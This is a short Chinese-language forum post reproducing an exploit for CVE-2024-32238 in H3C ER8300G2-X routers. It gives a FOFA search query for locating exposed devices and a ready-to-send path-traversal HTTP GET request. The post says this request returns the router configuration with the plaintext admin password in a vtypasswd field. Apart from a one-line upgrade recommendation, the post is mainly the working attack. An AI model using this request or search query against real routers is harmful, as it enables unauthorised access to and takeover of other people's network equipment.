CVE-2024-32238 H3C-密码泄漏

打印 上一主题 下一主题

主题 1018|帖子 1018|积分 3058

漏洞影响:
H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。
FOFA搜索:
app="H3C-Ent-Router" && title=="ER8300G2-X系统管理"


漏洞复现
POC:
  1. GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
  2. Host: x.x.x.x
  3. User-Agent: Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
  4. Connection: close
  5. Accept-Encoding: gzip
复制代码

返回包中存在有vtypasswd参数,告诉了我们登录的密码。


修复发起:升级到最新版本

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

王國慶

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表